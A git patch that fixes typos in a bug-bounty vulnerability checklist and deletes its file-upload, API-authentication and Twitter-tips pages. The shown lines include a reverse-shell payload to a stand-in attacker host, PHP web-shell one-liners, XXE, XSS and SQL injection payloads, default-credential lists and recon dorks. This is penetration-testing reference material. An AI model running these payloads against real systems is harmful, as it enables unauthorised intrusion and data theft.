From 1f2417083cba8c7ea74b5aeadbc85b6e5c8cf19c Mon Sep 17 00:00:00 2001 From: Maksim Partsiankou Date: Tue, 10 Dec 2024 19:13:29 +0100 Subject: [PATCH 1/3] fix typos in text --- Acount takeover/ATO.md | 6 +- Admin panal/adminpanal.md | 8 +- Aem misconfiguration/aem.md | 8 +- Api Authentication /Authentication.md | 771 -------------------------- Bussiness Logic/bussiness logic.md | 6 +- CSRF/csrf.md | 2 +- Cookie Attack/cookie.md | 26 +- File Upload/File Upload.md | 239 -------- IDOR Vulnerability/idor.md | 14 +- RXSS/xss.md | 4 +- exif Vulnerability/exif_geo.md | 6 +- register vulnerability/register.md | 16 +- tips from twitter /tips_twitter.md | 325 ----------- 13 files changed, 48 insertions(+), 1383 deletions(-) delete mode 100644 Api Authentication /Authentication.md delete mode 100644 File Upload/File Upload.md delete mode 100644 tips from twitter /tips_twitter.md diff --git a/Acount takeover/ATO.md b/Acount takeover/ATO.md index 2795d13..611a9a2 100644 --- a/Acount takeover/ATO.md +++ b/Acount takeover/ATO.md @@ -52,7 +52,7 @@ Occasionally, the application displays unnecessary data, such as valid OTPs, has [ ] **password reset** ``` 1. check if you are able to brute force the password reset OTP -2. test for token predectability +2. test for token predictability 3. test for JWT misconfigurations 4. check if the password reset endpoint is vulnerable to IDOR 5. check if the password reset endpoint is vulnerable to Host Header injection @@ -99,7 +99,7 @@ if the application does not use auth token or you can't access the cookies becau [ ] **IDOR to Account Takerover** ``` -1. checck if the email update endpoint is vulnerable to IDOR +1. check if the email update endpoint is vulnerable to IDOR 2. check if the password change endpoint is vulnerable to IDOR 3. check if the password reset endpoint vulnerable to IDOR ``` @@ -144,7 +144,7 @@ when send rest account request intercept POST Request and Change Host header val [ ] **CORS Misconfiguration to Account Takeover** -If the page contains CORS missconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose: +If the page contains CORS misconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose: ``` https://book.hacktricks.xyz/pentesting-web/cors-bypass ``` diff --git a/Admin panal/adminpanal.md b/Admin panal/adminpanal.md index 349a5e3..5822cdf 100644 --- a/Admin panal/adminpanal.md +++ b/Admin panal/adminpanal.md @@ -1,5 +1,5 @@ -[ ] defualt credentials -[defualt credentials](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#default-credentials) +[ ] default credentials +[default credentials](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#default-credentials) ``` admin:admin admin:password @@ -7,12 +7,12 @@ author:author administrator:password admin123:password username:pass12345 -and many of defualt credentials +and many of default credentials ``` [ ] Bypass by SQL Injection ``` -inject username or paswword with a lot of payloads: +inject username or password with a lot of payloads: => error based => time based ``` diff --git a/Aem misconfiguration/aem.md b/Aem misconfiguration/aem.md index 7d14e87..b68db24 100644 --- a/Aem misconfiguration/aem.md +++ b/Aem misconfiguration/aem.md @@ -2,7 +2,7 @@ https://www.youtube.com/watch?v=EQNBQCQMouk ##### method - collect sub domain -- use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem +- use nuclei/nuclei-templates/technologies/tech-detect.yaml to identify aem - Python3 ./aem_hacker.py –u https://example — host localhost - use https://github.com/clarkvoss/AEM-List/blob/main/paths to fuzz on path @@ -10,7 +10,7 @@ https://www.youtube.com/watch?v=EQNBQCQMouk - https://github.com/0ang3el/aem-hacker - https://github.com/0ang3el/aem-rce-bundle ``` -python3 aem_hacker.py -u --host yourvpshostname =>comman usage +python3 aem_hacker.py -u --host yourvpshostname =>common usage python3 aem_discovery.py --file urls.txt --workers 150 =>discover url python3 aem_enum.py --url => automate usernames and secrets grabbing python3 aem_ssrf2rce.py --url --fakaem yourvbs @@ -102,7 +102,7 @@ jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')% ``` everything is stored in jcr repository : - secrets (password ,encryption key , tokens) -- cinfiguration +- configuration - pII - usernames @@ -136,7 +136,7 @@ everything is stored in jcr repository : - /.ext.json - /.childrenlist.json - or guess node names : - - comman names /content, /home, /var, /etc + - common names /content, /home, /var, /etc - Dump props for each child node of jcr:root : - /etc.json or /etc.s.json or /etc.-1.json diff --git a/Api Authentication /Authentication.md b/Api Authentication /Authentication.md deleted file mode 100644 index 9d2a704..0000000 --- a/Api Authentication /Authentication.md +++ /dev/null @@ -1,771 +0,0 @@ -97 JSON Tests for for Authentication Endpoints link pdf [link](https://www.linkedin.com/feed/update/urn:li:activity:7097279293608607746/) - -1. Basic credentials -``` -{ -"login": "admin", -"password": "admin" -} -``` - -2. Empty credentials: -``` -{ -"login": "", -"password": "" -} -``` - -3- Null values: -``` -{ -"login": null, -"password": null -} -``` - -4. Credentials as numbers: -``` -{ -"login": 123, -"password": 456 -} -``` - -6. Credentials as booleans: -``` -{ -"login": true, -"password": false -} -``` - -7. Credentials as arrays: -``` -{ -"login": ["admin"], -"password": ["password"] -} -``` - -8. Credentials as objects: -``` -{ -"login": {"username": "admin", -"password": {"password": "password"}} -} -``` - -9. Special characters in credentials: -``` -{ -"login": "@dm!n", -"password": "p@ssw0rd#" -} -``` - -10. SQL Injection: -``` -{ -"login": "admin' --", -"password": "password" -} -``` - -11. HTML tags in credentials: -``` -{ -"login": "

admin

", -"password": "ololo-HTML-XSS" -} -``` - -12. Unicode in credentials: -``` -{ -"login": "\u0061\u0064\u006D\u0069\u006E", -"password":"\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064" -} -``` - -13. Credentials with escape characters: -``` -{ -"login": "ad\\nmin", -"password": "pa\\ssword" -} -``` - -14. Credentials with white space: -``` -{ -"login": " ", -"password": " " -} -``` - -15. Overlong values: -``` -{ -"login": "a"*10000, -"password": "b"*10000 -} - -``` -16. Malformed JSON (missing brace): -``` -{ -"login": "admin", -"password": "admin" -} -``` - -17. Malformed JSON (extra comma): -``` -{ -"login": "admin", -"password": "admin", -} -``` - -18. Missing login key: -``` -{ -"password": "admin" -} -``` - -19. Missing password key: -``` -{ -"login": "admin" -} -``` - -20. Swapped key values: -``` -{ -"admin": "login", -"password": "password" -} -``` - -21. Extra keys: -``` -{ -"login": "admin", -"password": "admin", -"extra": "extra" -} -``` - -22. Missing colon: -``` -{ -"login" "admin", -"password": "password" -} -``` - -23. Invalid Boolean as credentials: -``` -{ -"login": yes, -"password": no -} -``` - -25. All keys, no values: -``` -{ -"": "", -"": "" -} -``` - -26. Nested objects: -``` -{ -"login": {"innerLogin": "admin", -"password": {"innerPassword": "password"}} -} -``` -27. Case sensitivity testing: -``` -{ -"LOGIN": "admin", -"PASSWORD": "password" -} -``` - -28. Login as a number, password as a string: -``` -{ -"login": 1234, -"password": "password" -} -``` - -29. Login as a string, password as a number: -``` -{ -"login": "admin", -"password": 1234 -} -``` - -30. Repeated keys: -``` -{ -"login": "admin", -"login": "user", -"password": "password" -} -``` -31. Single quotes instead of double: -``` -{ -'login': 'admin', -'password': 'password' -} -``` -33. Login and password with only special characters: -``` -{ -"login": "@#$%^&*", -"password": "!@#$%^&*" -} -``` -34. Unicode escape sequence: -``` -{ -"login": "\u0041\u0044\u004D\u0049\u004E", -"password":"\u0050\u0041\u0053\u0053\u0057\u004F\u0052\u0044" -} -``` - -35. Value as object instead of string: -``` -{ -"login": {"$oid": -"507c7f79bcf86cd7994f6c0e"}, -"password": "password"} -} -``` - -37. Nonexistent variables as values: -``` -{ -"login": undefined, -"password": undefined -} -``` - -38. Extra nested objects: -``` -{ -"login": "admin", -"password": "password", -"extra": {"key1": "value1", -"key2": "value2"} -} - -``` - -39. Hexadecimal values: -``` -{ -"login": "0x1234", -"password": "0x5678" -} -``` - -40. Extra symbols after valid JSON: -``` -{ -"login": "admin", -"password": "password"}@@@@@@ -} -``` - -41. Only keys, without values: -``` -{ -"login":, -"password": -} -``` - -42. Insertion of control characters: -``` -{ -"login": "ad\u0000min", -"password": "pass\u0000word" -} -``` - -43. Long Unicode Strings: -``` -{ -"login": "\u0061"*10000, -"password": "\u0061"*10000 -} -``` - -44. Newline Characters in Strings: -``` -{ -"login": "ad\nmin", -"password": "pa\nssword" -} -``` - -45. Tab Characters in Strings: -``` -{ -"login": "ad\tmin", -"password": "pa\tssword" -} -``` - -46. Test with HTML content in Strings: -``` -{ -"login": "admin", -"password": "password" -} -``` - -47. JSON Injection in Strings: -``` -{ -"login": "{\"injection\":\"value\"}", -"password": "password" -} -``` - -48. Test with XML content in Strings: -``` -{ -"login": "admin", -"password": "password" -} -``` - -49. Combination of Number, Strings, and Special characters: -``` -{ -"login": "ad123min!@", -"password": "pa55w0rd!@" -} -``` - -50. Use of environment variables: -``` -{ -"login": "${USER}", -"password": "${PASS}" -} -``` - -51. Backslashes in Strings: -``` -{ -"login": "ad\\min", -"password": "pa\\ssword" -} -``` - -52. Long strings of special characters: -``` -{ -"login": "!@#$%^&*()"*1000, -"password": "!@#$%^&*()"*1000 -} -``` - -53. Empty Key in JSON: -``` -{ -"": "admin", -"password": "password" -} -``` - -55. JSON Injection in Key: -``` -{ -"{\"injection\":\"value\"} -": "admin", -"password": "password" -} -``` - -56. Quotation marks in strings: -``` -{ -"login": "\"admin\"", -"password": "\"password\"" -} -``` - -57. Credentials as nested arrays: -``` -{ -"login": [["admin"]], -"password": [["password"]] -} -``` - -58. Credentials as nested objects: -``` -{ -"login": {"username": {"value": "admin", -"password": {"password": {"value": -"password" -} -``` - -59. Keys as numbers: -``` -{ -123: "admin", -456: "password" -} -``` - -60. Testing with greater than and less than signs: -``` -{ -"login": "admin>1", -"password": "alert('hi')", -"password": "password" -} -``` - -85. Negative numbers as strings: -``` -{ -"login": "-123", -"password": "-456" -} -``` - -86. Values as URLs: -``` -{ -"login": "https://admin.com", -"password": "https://password.com" -} -``` - -87. Strings with email format: -``` -{ -"login": "admin@admin.com", -"password": "password@password.com" -} -``` -88. Strings with IP address format: -``` -{ -"login": "192.0.2.0", -"password": "203.0.113.0" -} -``` - -89. Strings with date format: -``` -{ -"login": "2023-08-03", -"password": "2023-08-04" -} -``` - -90. JSON with exponential values: -``` -{ -"login": 1e+30, -"password": 1e+30 -} -``` - -91. JSON with negative exponential values: -``` -{ -"login": -1e+30, -"password": -1e+30 -} -``` - -92. Using Zero Width Space (U+200B) in strings: -``` -{ -"login": "admin​", -"password": "password​" -} -``` - -93. Using Zero Width Joiner (U+200D) in strings: -``` -{ -"login": "adminâ€", -"password": "passwordâ€" -} -``` - -94. JSON with extremely large numbers: -``` -{ -"login": 12345678901234567890, -"password": 12345678901234567890 -} -``` - -95. Strings with backspace characters: -``` -{ -"login": "admin\b", -"password": "password\b" -} -``` - -96. Test with emoji in strings: -``` -{ -"login": "admin😀", -"password": "password😀" -} -``` - -97. JSON with comments, although they are not officially supported in JSON: -``` -{ -/*"login": "admin", -"password": "password"*/ -} -``` - -98. JSON with base64 encoded values: -``` -{ -"login": "YWRtaW4=", -"password": "cGFzc3dvcmQ=" -} -``` - -99. Including null byte character (may cause truncation): -``` -{ -"login": "admin\0", -"password": "password\0" -} -``` - -100. JSON with credentials in scientific notation: -``` -{ -"login": 1e100, -"password": 1e100 -} -``` - -102. Strings with octal values: -``` -{ -"login": "\141\144\155\151\156", -"password":"\160\141\163\163\167\157\162\144" -} -``` -103. writeup -``` -{ -root:{ -"username": "admin", -"password":"admin" -} -} -``` - -104. writeup -``` -basic => username=admin -username[]=admin -username[0]=admin -username=admin&username=admin -delete username=admin - -``` diff --git a/Bussiness Logic/bussiness logic.md b/Bussiness Logic/bussiness logic.md index a29f670..affda97 100644 --- a/Bussiness Logic/bussiness logic.md +++ b/Bussiness Logic/bussiness logic.md @@ -1,6 +1,6 @@ 1. change the price with other price :100->50 -2. change the price with nagative price :100->-100 -3. change the price with other price by add nagative value: 100 ->(+-120) +2. change the price with negative price :100->-100 +3. change the price with other price by add negative value: 100 ->(+-120) 4. change the price with other price by mult by 0.5: 100->(0.5*100) 5. Retrieving a Profile ``` @@ -198,5 +198,5 @@ from URLs or by using some internal parameters. • Once a target parameter has been identified start doing basic brute force or guess work to fetch another user’s files from server. ``` -26. null pyloads +26. null payloads 27. in change password try to delete current password diff --git a/CSRF/csrf.md b/CSRF/csrf.md index 9dba5d9..68e2fc9 100644 --- a/CSRF/csrf.md +++ b/CSRF/csrf.md @@ -88,7 +88,7 @@ email=....&csrftoken=..... - steps 1- create two accounts 2- go to the first account and change email we will change -3- go to second account and try intersept change email then drop request , copy the csrf token +3- go to second account and try intercept change email then drop request , copy the csrf token 4- go to the first account and put csrf token(second account) and try change email is valid or not diff --git a/Cookie Attack/cookie.md b/Cookie Attack/cookie.md index 2e773c4..d0e8fb1 100644 --- a/Cookie Attack/cookie.md +++ b/Cookie Attack/cookie.md @@ -1,6 +1,6 @@ -[ ] sensetive Data Stored in Cookies +[ ] sensitive Data Stored in Cookies ``` -check if anf pii or other sensitive infromation stored in cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc. +check if anf pii or other sensitive information stored in cookies this information usually includes : email, sessionID, data of birth, mobile address, ssn, etc. ``` [ ] cookie length violation @@ -24,12 +24,12 @@ some times it can be used to escalate privilege or if the application malfunctio [ ] Mass Assignment ``` -similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id parameter +similar to the parameter pollution, however in this , attacker tried to inject multiple user ID in same user_id parameter ``` [ ] Damial of service - cookie Bomb ``` -forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attack +forcing the server to process cookies larger than the restricted cookie size defined by the server may cause danial of service attack https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx @@ -64,7 +64,7 @@ sqlmap -u "" --cookie="" -p "" --dbs - the application is not retrieve data it is not vulnerability ``` -[ ] Authentication Bybass (cookie are not avalid) +[ ] Authentication Bybass (cookie are not valid) ``` try accessing a protected resource by removing cookies ``` @@ -77,9 +77,9 @@ change the "name" value to "xss payload" [ ] Insufficient session management ``` -1. session doesnt expire on logout -2. long session expirey -3. session doesnt expire on password reset /change +1. session doesn't expire on logout +2. long session expired +3. session doesn't expire on password reset /change 4. concurrent session ``` @@ -87,7 +87,7 @@ change the "name" value to "xss payload" - horizontal ``` 1.assume that the application uses mult-organization models -2.cookie are used wich organized user can access +2.cookie are used which organized user can access 3.alter the cookie in order to access some other application ``` - vertical @@ -98,12 +98,12 @@ change the "name" value to "xss payload" - similarly ``` 1.try if the flower users cookies can be used to access higher users function -2.try if the cookie of organization 1 user van be used to access function of organizaion 2 +2.try if the cookie of organization 1 user van be used to access function of organization 2 ``` -[ ] sesion puzzing +[ ] session puzzling ``` -when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user +when an application utilizes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user ``` @@ -157,7 +157,7 @@ str("-"*50),__import__('os').popen('COMMAND').read() ``` [ ] Insecure Deserialization ``` - if cookis are using serialized Objects ,try performing insecure Deserialization Checks. + if cookies are using serialized Objects ,try performing insecure Deserialization Checks. portswigger laps ``` [ ] Electronic Code Book diff --git a/File Upload/File Upload.md b/File Upload/File Upload.md deleted file mode 100644 index 0da15b1..0000000 --- a/File Upload/File Upload.md +++ /dev/null @@ -1,239 +0,0 @@ -## Where to find -In upload file feature, for example upload photo profile feature - -## How to exploit -read also this pdf it conayin a many of ideas -1-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/File-Upload.pdf by`0xAwali` -2-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/Slides(1).pdf by`ebrahim hegazy` - -1. Change the `Content-Type` value -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: application/x-php -``` -Change the Content-Type -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: image/jpeg -``` - -2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" -Content-Type: application/x-php -``` -Change the request to this -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: application/x-php -``` - -3. Upload the payload, but start with GIF89a; and -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: image/gif - -GIF89a; -``` -And dont forget to change the content-type to image/gif - -4. Bypass content length validation, it can be bypassed using small payload -``` -() -``` - -5. Using null byte in filename -``` -file.php%00.gif -``` - -6. Using double extensions for the uploaded file -``` -file.jpg.php -``` - -7. Uploading an unpopular php extensions (php4,php5,php6,phtml) -``` -file.php5 -``` - -8. Try to randomly capitalizes the file extension -``` -file.pHP5 -``` - -9. Mix the tips! - - -- Upload Function - - Extensions Impact - - `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE - - `SVG`: Stored XSS, SSRF, XXE - - `GIF`: Stored XSS, SSRF - - `CSV`: CSV injection - - `XML`: XXE - - `AVI`: LFI, SSRF - - `HTML`, `JS` : HTML injection, XSS, Open redirect - - `PNG`, `JPEG`: Pixel flood attack (DoS) - - `ZIP`: RCE via LFI, DoS - - `PDF`, `PPTX`: SSRF, BLIND XXE - - Blacklisting Bypass - - PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc` - - ASP → `asp`, `.aspx`, `.cer`, `.asa` - - Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf` - - Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm` - - Using random capitalization → `.pHp`, `.pHP5`, `.PhAr` - - Whitelisting Bypass - - `file.jpg.php` - - `file.php.jpg` - - `file.php.blah123jpg` - - `file.php%00.jpg` - - `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00. - - `file.php%00` - - `file.php%20` - - `file.php%0d%0a.jpg` - - `file.php.....` - - `file.php/` - - `file.php.\` - - `file.php#.png` - - `file.` - - `.html` - - Vulnerabilities - - [ ] Directory Traversal - - Set filename `../../etc/passwd/logo.png` - - Set filename `../../../logo.png` as it might changed the website logo. - - [ ] SQL Injection - - Set filename `'sleep(10).jpg`. - - Set filename `sleep(10)-- -.jpg`. - - [ ] Command Injection - - Set filename `; sleep 10;` - - [ ] SSRF - - Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor. - - SSRF Through `.svg` file. - - ```php - - ``` - - - [ ] ImageTragic - - ``` - push graphic-context - viewbox 0 0 640 480 - fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' - pop graphic-context - ``` - - - [ ] XXE - - Upload using `.svg` file - - ```xml - - ]> - - &xxe; - - ``` - - ```xml - - - - ``` - - - Using excel file - - [ ] XSS - - Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg"` - - Upload using `.gif` file - - ``` - GIF89a/**/=alert(document.domain)//; - ``` - - - Upload using `.svg` file - - ```xml - - ``` - - ```xml - - - - - - - - ``` - - - [ ] Open Redirect - 1. Upload using `.svg` file - - ```xml - - - - - - - ``` - - - Content-ish Bypass - - [ ] Content-type validation - - Upload `file.php` and change the `Content-type: application/x-php` or `Content-Type : application/octet-stream` - to `Content-type: image/png` or `Content-type: image/gif` or `Content-type: image/jpg`. - - [ ] Content-Length validation - - Small PHP Shell - - ```php - () - ``` - - - [ ] Content Bypass Shell - - If they check the Content. Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` ) - - ```php - GIF89a; - ``` - - - Misc - - [ ] Uploading `file.js` & `file.config` (web.config) - - [ ] Pixel flood attack using image - - [ ] DoS with a large values name: `1234...99.png` - - [ ] Zip Slip - - If a site accepts `.zip` file, upload `.php` and compress it into `.zip` and upload it. Now visit, `site.com/path?page=zip://path/file.zip%23rce.php` - - [ ] Image Shell - - Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file `mv pic.jpg pic.php.jpg` - - ```php - exiftool -Comment='"; system($_GET['cmd']); ?>' pic.jpg - ``` diff --git a/IDOR Vulnerability/idor.md b/IDOR Vulnerability/idor.md index d958e7c..f365a1e 100644 --- a/IDOR Vulnerability/idor.md +++ b/IDOR Vulnerability/idor.md @@ -7,13 +7,13 @@ Base Steps: ``` [ ] -[ ] image profilie -[ ] delete acount -[ ] infromation acount +[ ] image profile +[ ] delete account +[ ] information account [ ] VIEW & DELETE & Create api_key [ ] allows to read any comment [ ] change price -[ ] chnage the coin from dollar to uaro +[ ] change the coin from dollar to uaro [ ] Try decode the ID, if the ID encoded using md5,base64,etc ```html GET /GetUser/dmljdGltQG1haWwuY29t @@ -74,7 +74,7 @@ GET /api/users/* [ ] Never ignore encoded/hashed ID ```bash -for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD +for hashed ID ,create multiple accounts and understand the pattern application users to allot an iD ``` [ ] Google Dorking/public form @@ -87,7 +87,7 @@ search all the endpoints having ID which the search engine may have already inde use tools like arjun , paramminer ``` -[ ] Bypass object level authorization Add parameter onto the endpoit if not present by defualt +[ ] Bypass object level authorization Add parameter onto the endpoint if not present by default ```bash GET /api_v1/messages ->200 GET /api_v1/messages?user_id=victim_uuid ->200 @@ -125,7 +125,7 @@ GET /user_data/2341.txt -> 200 {"userid":{"userid":123}} ->200 ``` -[ ] Test an outdata API version +[ ] Test an outdated API version ```bash GET /v3/users_data/1234 ->401 GET /v1/users_data/1234 ->200 diff --git a/RXSS/xss.md b/RXSS/xss.md index 8ff286a..f437174 100644 --- a/RXSS/xss.md +++ b/RXSS/xss.md @@ -42,7 +42,7 @@ https://github.com/yavolo/eventlistener-xss-recon - use your payloads :``   -- your report if not acceptd  +- your report if not accepted  - cat host.txt | crawler | tee -a endpoint.txt   & cat host.txt | waybackurl | tee -a endpoint.txt  @@ -71,7 +71,7 @@ XSS.yaml : gist.githubusercontent.com/raoufmaklouf/7…  ### third method ``` -irst of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and +First of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and then subdomain brute-forcing with [knockpy](https://github.com/guelfoweb/knock), then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS and then I used [gf](https://github.com/tomnomnom/gf) to get possible XSS parameters. after sorting the URLs I used [KXSS](https://github.com/Emoe/kxss) diff --git a/exif Vulnerability/exif_geo.md b/exif Vulnerability/exif_geo.md index 8bf3d6e..5c7a1a8 100644 --- a/exif Vulnerability/exif_geo.md +++ b/exif Vulnerability/exif_geo.md @@ -4,12 +4,12 @@ When a user uploads an image in example.com, the uploaded image’s EXIF Geoloca

Steps to reproduce:

1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg)
-2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s .
+2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also with different MB’s .
3. Go to Upload option on the website
4. Upload the image
-5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )
+5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect, edit it as html )
6. open it (http://exif.regex.info/exif.cgi)
-7. See wheather is that still showing exif data , if it is then Report it. +7. See weather is that still showing exif data, if it is then Report it. # Reports (Hackerone) diff --git a/register vulnerability/register.md b/register vulnerability/register.md index b8dec7a..7d229c9 100644 --- a/register vulnerability/register.md +++ b/register vulnerability/register.md @@ -4,8 +4,8 @@ 1. create first account in application with email say abc@gmail.com and password 2. logout of the account and create another account with same email and different password 3. you can even try to change email case like from abc2gmail.com to Abc@gmail.com -4. finish the creation proccess and see that it succceed -5. now go back and try to login with email and the new password ,you are seccess logged in +4. finish the creation process and see that it succeed +5. now go back and try to login with email and the new password, you are success logged in ``` [ ] Dos at name /password field in sign up page ``` @@ -16,8 +16,8 @@ [ ] no rate limit at signup page ``` -1. enter your details in signuo form and submit the form -2. capture the signuo request and send it to intruder +1. enter your details in signup form and submit the form +2. capture the signup request and send it to intruder 3. add $$ to email parameter 4. in the payload add different email address 5. fire up intruder and check whether it return 200 ok @@ -33,11 +33,11 @@ xss can be test in any of parameter [ ] email varification can be easily bypassed with following method ``` -1. response manipulation change the bad respone with good one like false to true +1. response manipulation change the bad response with good one like false to true 2. status code manipulation change the 403 to 200 ``` -[ ] weak register implemntation +[ ] weak register implementation ``` 1. check whether the allows disposable email addresses 2. register form on non-https page @@ -45,7 +45,7 @@ xss can be test in any of parameter [ ] weak password policy ``` -1. check whether application allows easily guessable passsword like 123456 +1. check whether application allows easily guessable password like 123456 2. check if you can use username same as the email address 3. check if can use password same as that email address 4. improperly implemented password recovery link functionality @@ -53,5 +53,5 @@ xss can be test in any of parameter [ ] Path Overwrite ``` -If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting takeovered. +If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will come up and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting take overed. ``` diff --git a/tips from twitter /tips_twitter.md b/tips from twitter /tips_twitter.md deleted file mode 100644 index c5852b9..0000000 --- a/tips from twitter /tips_twitter.md +++ /dev/null @@ -1,325 +0,0 @@ -[ ] Tip 1 -``` -Here’s my last finding (P1) -1- register account -2- intercept request -3- here’s the response in image so in “role” parameter we have ROLE_USER -So i don’t know what i can replace it to privilege my account to admin -4- open source code and look in js files -5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role” -6- so i use match and replace to replace value’s -7- boom privilege my account to admin account with full control -``` -[ ] Tip 2 -``` -اسعد الله ايامكم بكل خير - -هذا ثغرة في شركة مايكروسوفت -كانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS - -Exploit: -https//anywebsite.com/c:/Windows/Win.ini -``` - -[ ] Tip 3 -``` -CloudFront bypass:⚔️ - -">%0D%0A%0D%0A - -Would be interested to know if this is target specific or other CloudFront websites are vulnerable -``` - -[ ] Tip 4 - -``` -1 : Get all the URL from wayback / Gau -2 : Filter out the js file using httpx -3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension -``` -[ ] Tip 5 -``` -target.com/wp-config.php => 404 not found -target.com/wp-config.php.… ==> 200 ok and downloaded -wp-config.php.swp ==>>200 ok - -after that if its contain encoded using hexadecimal decode it . -``` - -[ ] Tip 6 -``` -try testing for SQLi Authentication Bypass :⚔️ -username:'--'/"--" -password:'--'/"--" -``` -[ ] Tip 7 -``` -default credentials: -PSADMIN:PSADMIN -PS:PS -PSEM:PSEM -Google Dork: intitle:"Oracle+PeopleSoft+Sign-in" -Wrote a nuclei template to test all permutations -``` -[ ] Tip 8 -``` -nmap -sV -iL host.txt -oN nmap_scan.txt -Wait a few hours -cat nmap_scan.txt | grep open -``` - -[ ] Tip 9 -```Bybass cloudfaire with cynses search -https://youtu.be/VsM6ERUx_AA ------------------------------------------- ------------------------------------------- -Xss payload -https://github.com/Aacle/xss_payload ------------------------------------------- ------------------------------------------- -Use Nuclei for leaked api. -$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken} ------------------------------------------- ------------------------------------------- -#Scan through #TOR -sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5 ------------------------------------------- ------------------------------------------- -Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token, -and check access to each repo of main organization - ------------------------------------------- ------------------------------------------- - -bypass alert ==> [alert][0].call(this,1) ------------------------------------------- ------------------------------------------- -``` - -[ ] Tip 10 -``` -1_ Go to SHODAN and get the IP -2 _ Go to Dirsearch and do a Fuzzing -3_ Obtaining sensitive data -``` -[ ] Tip 11 -``` -Recon Recon Recon!! -Shodan Dorking Always wins. - -ssl:"Company Inc" -Filter results by http title. -Start fuzzing an interesting asset. -Found swagger-ui/ -Tried swagger ui xss with -https://github.com/seanmarpo/webjars-swagger-xss -``` -[ ] Tip 12 -``` -Have you ever heard about wc-db file disclosure?! - -> you can check it by: -https://target[.]com/.svn/wc.db - -> then you can use this tool to dump all of the website source code - -https://github.com/anantshri/svn-extractor -``` - -[ ] Tip 13 -``` -1. Shodan Dork -> Some Assets. -2. Fuzzing & got 403 Forbidden on /config dir. -3. Fuzzing on /config/FUZZ and getting some config files. -4. Same pattern and it works on another asset. -``` - -[ ] Tip 14 -``` - -Default Credentials admin:admin -- shodan dork : -- ssl:"target[.]com" 200 http.title:"dashboard" - -``` -[ ] Tip 15 - - -A quick thread about JIRA misconfiguration that I tried today. -``` -3. Google dorks to find jira dashboards. - -inurl:/ConfigurePortalPages!default.jspa?view=popular -``` -``` -4. Google dork to find jira filters page. - -inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public ) -``` - -[ ] Tip 16 -``` -5. Google dork to find the exposed user list. - -inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log -``` - -[ ] Tip 17 -``` -GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information -dork: "org:company extension:csv admin" -leak: 